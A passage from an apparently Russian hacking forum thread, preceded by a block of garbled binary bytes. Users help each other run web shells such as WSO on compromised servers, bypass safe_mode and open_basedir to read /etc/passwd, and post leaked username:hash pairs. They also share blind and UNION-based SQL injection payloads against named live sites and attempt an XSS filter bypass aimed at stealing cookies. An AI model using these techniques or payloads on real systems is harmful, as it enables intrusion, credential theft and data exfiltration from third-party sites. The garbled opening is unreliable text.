…уйНEHЅo’zЈ\»— ЗЗqґW–л!’‚Ѕ/YСYNOИ7yАЄ†Ґ†жё„лЦ\¦[Џ, ЩњЕкоµуєyьЖµЇS—9±Zd›‰}ЗІі ЃM…Ђ&“Й"(6:ЎфЭ%тјх!hfqОо”ЖK‡иUKYb;lLљ! Щ%СС6яќ`ћїUГЧј«ѕct"hј“љЫpІЦЈ}XЫnH›НЧл±ћџ-Я
НnE‘’xmХjЫM©±Сђuьinuз/‰GЁВ sиu›[Тv7~FTо{3qўFњќ/,ѓ}M—C Ќ9=ёLv”Q]p|№бxV$ОLЅЮ)OэH Z‘јнX s]VКW!ЄYxцw_SnыЋп±тlч®`џPБ±е(+ „
9pл¦јо2eЧUYщ®?њБ№lbЫЄ’`c№э7 „ S«9LVљОЦ~©1O©ЩІлNФ_ЦwіЕNЂ…ђх� �И!ќЕUљ}zкжА2M¦Гў;xSґ—_Їч‘H� �wќЩќ–ДҐ5є
·щu`%| 1пk74ЌА.™¬гDЄj

В папке нету .htaccess(точнее есть,но он с .txt расширением,что не берётся в рассчёт).В disable_functions стоит no value,но вот функции system(),exec() не работают почему-то,но функция phpinfo() работает.Ветка РНР пятая.В чём может быть проблема ?

Права на фаил: -rw-r--r--.Не вижу проблемы,ибо шеллы запускаются и с r правами(

.htaccess ограничивающий запуск php-скриптов может быть и выше, вообще в самом-самом корне, если нет .htaccess папкой ниже с пересекающимися функциями однотипными - то все распространяется на вложенные подпапки.

Ну или php вообще не установлен никак, допустим юзают только perl

Нет,РНР однозначно установлен+phpinfo() выполняется...А если один .htaccess ,который расположен ниже,снимает все запреты(не вжнок акие),а верхний,наоборот,ставит,то в результате запреты будут стоять ?

нет, если инструкции касаются одного и того же - будет работать "ближайший" .htaccess:)

(если он не ниже папки со скриптом, а как минимум в ней же или выше)

В корне стоит только такой .htaccess:

RewriteEngine On
Options +FollowSymlinks
RewriteBase /
RewriteRule ^(.*)\.php/(.*)/(.*)/(.*)/(.*)/(.*)/(.*)$ /$1.php?$2=$3&$4=$5&$6=$7 [L]
RewriteRule ^(.*)\.php/(.*)/(.*)/(.*)/(.*)$ /$1.php?$2=$3&$4=$5 [L]
RewriteRule ^(.*)\.php/(.*)/(.*)$ /$1.php?$2=$3 [L]



Я так понимаю,что это какие-то преобразования,но это меня не затрагивает(хоть я и не знаю,что именно тут происходит).Ещё варианты ? Напоминаю: phpinfo() выполняется,а значит,и РНР исполняется...

значит смени шелл:))) Возьми тот же WSO - нехрен выё, пробовать надо разные варианты всегда. Вот у меня сегодня тоже с99 (правда 100% нормальный:)) не сработал, а WSO - сработал. Честное благородное слово

другие шеллы лил?если они пашут, значит возможно gzinflate - читай что это и вникай, любитель с99....
если нет - то это настройка веб-сервера, пробуй др.диру или шелл попроще.

ХАХ)))) Заработал WSO)))))))))))))))))))))).М.......магия!)))) ))))))))))))))))

Вот только... httpdocs/images/ u--------- [ home ]

Can't open this folder! А ведь у неё прова-то полные:Д

Пардон опять...там open_basedir.WSO обходит его? Но вот почему тогда список файлов не выдаёт,ведь ограничение должно рабортать.если я перейду выше httpdocs

ЗЫ: Облом короче,при чём - полный.Он ни список файлов не может получить,ни lsattr и ls - la не работают.Даже не знаю,что и делать./etc/passwd вообще не прочитать.

ЗЫ: SAFE MODE = ON; OPEN_BASEDIR = ON.Вот я попал...

Хм,прочитать фаил /etc/passwd я смог с помощью ini_restore() в шелле,но вот странно,почему он не читает файлы с правами -rw-r--r--.Open_basedir тут не должен распространяться,ибо он действует на диры,расположенные как раз выше искомой директории...фаил .html формата.Странно-странно,хотя функция работает

всем привет :Вообшем пароли в базе хранятсо в таком виде тут User:pass вообшем эт ппц мозг через порты ввода вывода вытекает что ЭТО ??? 539a44165e ?
-------------------------------------
simonwest:539a44165e
--------------------------------------------------------------------------------------------
daniel:a104ee6c66
---------------------------------------------------------------------------------------------
dn:ae8fc55ccd:
-------------------------------------------------------------------------------------
Вот ссылка на саму иньекцию :
http://forum.antichat.ru/threadedpost1313149.html#post1313149

да что угодно, например substr(md5("pass"),0,10)

Велемир, кажется это гз, но я могу ошибаться.

чтож спасибо cr0w,jokester,Grey что помогли)
смысл понятен. я к этому и стремился.
я например сделал для себя открытие) а вы наверна просто забыли что таблица пустая) или может тоже увидите что нить новое)

как я понял все упиралось в то что таблица была пустая и мускул раз нечего было сортировать и не обращает на ордер внимание)
(таблица act_topup пустая)

mysql> select * from test.act_topup order by if(1=2,1,(select 1 union select 2));
Empty set (0.00 sec)

mysql> select * from test.act_topup order by if(1=1,1,(select 1 union select 2));
Empty set (0.00 sec)

mysql> select * from mysql.user order by if(1=1,1,(select 1 union select 2));
...(вывод результатов)
4 rows in set (0.00 sec)

mysql> select * from mysql.user order by if(1=2,1,(select 1 union select 2));
ERROR 1242 (21000): Subquery returns more than 1 row



вот такая фигня)
поэтому есть ли какая нить функция которая бы принудительно заставила его брать в расчет ордер?
desc не помогает(

j0ker13

Ну а где тогда инъекция-то я не пойму?

Сортировка по любому полю даёт ошибку, это не инъекция , а нерабочий запрос.

У тебя нет рабочего запроса и влиять на запрос ты тоже никак не можешь. Его нельзя сделать рабочим. Ошибка будет всегда, если я правильно тебя понял. Тоесть даже при верном значении сортируемого поля сортировать будет нечего и база будет ругаться на то, что сортировать ей "не чего" и "не по чему".

Или я опять что-то упустил?

2jokester
ну смотри. поправь если где то неправ.
запрос который я дал выше может выполнится и без меня. я могу только чтонить к нему подписать. после ордер.
для примера два запроса(смысл схож с тем который был изначально)-
select * from mysql.user order by user,if(1=1,1,(select 1 union select 2));
выполнится нормально
select * from mysql.user order by user,if(1=2,1,(select 1 union select 2));
вылезет ошибка.

это не инъекция , а нерабочий запрос
запрос изначально рабочий. только таблица пустая

влиять на запрос ты тоже никак не можешь
да это так) но я могу в условии if сорвать запрос ошибкой)

все упирается в то что таблица пустая. если там была хоть одна бы запись можно веть было бы написать эксплоит только вместо 1=1,1=2 вставлять что то типа substring(version(),1,1)> и получится блинд)

все выше написанное не утверждение а домыслы) поправь если не трудно где ошибся)

То что ты показываешь выборку из mysql.user это понятно, она работает. Но она работает потому, что в таблице есть что сортировать.

Если в таблице ничего нет , то мы не сможем получить нормальный запрос. Тоесть пофигу какое там поле сортировки(если сортировка именно по полю), база его не обрабатывает(точнее обрабатывает , но как-то очень странно :)), она выбирает данные видит что их там нет и выкидывает Empty set

да это так) но я могу в условии if сорвать запрос ошибкой)

Только если в таблице что-то есть. Иначе нет.

Вообще на эту тему (ну или почти на эту) есть множество интересных задумок, но нет нормальной документации на mysql, стандарты она не держит и приходится всё проверять ручками. Так что то, что я пишу тут, это исключительно МОЙ взгляд, возможно и есть какое-то решение, но я его не вижу

2jokester
ну смотри. как я понимаю такие конструкции разрабатывать через подзапросы или(и) функции но и их не везде вставить(
так же есть запрос:
select .. from .. order by id limit a,b
a и b можно вставлять свои. но есть тока один вариант раскрутить это но там стоит ордер и юнион не прокатит.
а в лимит, как я пытался, не вставить if()
:) или можно как нить по другому?) как думаешь?

В лимите подзапросы и выражения запрещены (и как не странно это мускул держит)

Юнион как ты правильно заметил туда не впихнёшь, он будет после ордера.

И самое смешное, что в ордере по идее подзапросы тоже запрещёны, но разрабы mysql на это положили, и они там работают. Но это значит , что доков ты по этой теме не увидишь, их как-бэ нет, подзапросов в ордере , а значит и доков нет :)

Соответственно хрен поймёшь как база обрабатывает подзапрос, нельзя сказать, что она его совсем игнорирует, т.к. если таблица не пустая то он обрабатывается.
Тоесть что-то она проверяет, а вот с пустой таблицей я не смог заставить работать
more than 1 row
Такое ощущение, что в этом случае, базе плевать на то, что в подзапросе и она выкидывает Empty set

Моё мнение что не выйдет, но в любом случае можешь поразвлекаться на локалке и посмотреть, т.к. не исключаю, что решение может и найтись

==================
add


Насколько я понимаю, если в параметр ORDER BY мы помещаем выражение, то нужно чтоб оно возвращало именно имя колонки, по которой должна происходить сортировка, а не ее номер.

Кстати, если сможешь заставить базу воспринимать то, что она возвращает из подзапроса в ордере как ИМЯ КОЛОНКИ, дай мне знать , мы об эту тему с некоторыми товарищами уже весь мозг вывернули :D

Возвращает она строку, и никак не удаётся убедить её в том, что это колонка и по ней нужна сортировка.

jokester

mysql> SELECT @@version;
+---------------------+
| @@version |
+---------------------+
| 5.0.45-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> SELECT * from `users2`;
+-------+----------+
| name | password |
+-------+----------+
| admin | 348 |
| user1 | 469 |
| user2 | 1091 |
| user3 | 2221 |
| user4 | 5239 |
| user5 | 909 |
| cr0w | 3 |
+-------+----------+
7 rows in set (0.00 sec)

mysql> SELECT * from `users2` ORDER BY (SELECT password);
+-------+----------+
| name | password |
+-------+----------+
| user2 | 1091 |
| user3 | 2221 |
| cr0w | 3 |
| admin | 348 |
| user1 | 469 |
| user4 | 5239 |
| user5 | 909 |
+-------+----------+
7 rows in set (0.00 sec)

j0ker13

Я обратил внимание на то, что таблица пустая, но так и не понял, чего ты хотел в итоге получить тем своим запросом, поэтому решил оставить этот момент без комментария. (:

add: Мне почему-то ранее думалось, что выражение в первом параметре ORDER BY будет выполняться даже если в таблице нет данных. Надо будет поэксперементировать с этим...

cr0w
(SELECT password) Это не запрос знаешь-ли, так-же как и (select 1). Любая база увидев такое пошлёт тебя куда подальше. Это нестандартные фичи мускула, и работают они соответственно непонятно как :)

Ты запросы вот такие погоняй :

order by (select table_name from information_schema.tables limit 1)

order by (select user from mysql.user limit 1)

cr0w, мне кажется что если в таблице нет данных, то после ORDER BY выражение не посчитается, из-за банально оптимизации. Т.е. база не будет выполнять то, что не имеет смысла изначально.

jokester

Я, кстати, ведь и не писал там про подзапросы, а писал про выражения. Впрочем, "(SELECT password)" это как-никак, но подзапрос (неважно как он там в MySQL реализован) и это работает.

add: Ок, если подумать, то вобщем-то согласен с тобой, что это не совсем подзапрос (хотя, в терминологии документации MySQL, это можно назвать "подзапросом"). А как сделать то, что ты хотел бы увидеть, я не знаю и подозреваю что это невозможно в принципе, тут даже голову ломать незачем. (:

Qwazar

Да, я понял уже. (:

Подскажите плиз, вот я нашел ошибку, что дальше можно сделать?
http://www.gangotri.ru/cs?action=itemlist&txid='

p.s. не пинайте сильно ногами, я новенький :)

http://www.gangotri.ru/cs?action=itemlist&txid=1668+and+ascii(substring((select+table_name+f rom+information_schema.tables+limit+17,1),1,1))%3E 1

На сайте ege.vrn.ru нарыл вот такое дело
http://www.ege.vrn.ru/modules.php?name=Downloads&d_op=TopRated&ratenum=25%3Cfont%20color=red%3EnpuBeD!%3C/font%3E&ratetype=num
В $_GET['ratenum'] фильтруется javascript, но html код пропускает. Перепробовал много вариантов, а вставить тотже алерт не получилось. Возможно ли заюзать дырку?

Хм. Странный фильтр какой-то стоит на сайте...

<> - пропускает
() - нет пропускает
<img... - не пропускает
<iframe... - не пропускает
<font - пропускает
<s cript> - пропускает
<ja v ascri pt - пропускает

<body+onload=j+a+vas+c+r+ipt:..> - пропускает

картинку у меня еще получалось впихивать... в вот куки в предачу с ней никак

Каким запросом вывести инфу из бд? На сайте 6 бд! нужно из одной из них вывести инфу! Когда пишу ...3+from+users выдаёт ошибку( Сор если плохо объяснил)

SENIA
3+from+dbname.users
если прав хватит...

Каким запросом вывести инфу из бд? На сайте 6 бд! нужно из одной из них вывести инфу! Когда пишу ...3+from+users выдаёт ошибку( Сор если плохо объяснил)
Прочитай сообщение психа
Вот что я к нему дополняю...

...+union+select+1,TABLE_SCHEMA,3+from+information _schema.tables+where+table_name=TABLE_NAME+limit+1 ,1--

Где табл нейм там имя таблицы в виде хекса (0x+hex)
(лимит можно не ставить но я поставил)
Он тебе выдает имя БД где хранится таблица твоя
Дальше читай сообщение психа )

Так,я,кажется,разобрался.Об ход open_basedir с помощью функции ini_restore() работает только в случае,если в php.ini или vhosts.conf с помощью php_admin_value был указан open_basedir или с помощью php_admin_flag указан safe mode,но там не писали про php.ini.Если open_basedir будет закомментирован,то он автоматически принимает значение no value(Что-то вроде NULLа),и функция ini_restore() также срабатывает. Проверено на PHP 5.2.6.
В моём же случае open_basedir был указан(аж два):

1. /var/www/vhosts/site.ru/httpdocs
2. /tmp

(символ ":" - разделитель)

Спасибо за то,что пытались помочь.Похоже,что придётся искать другие пути...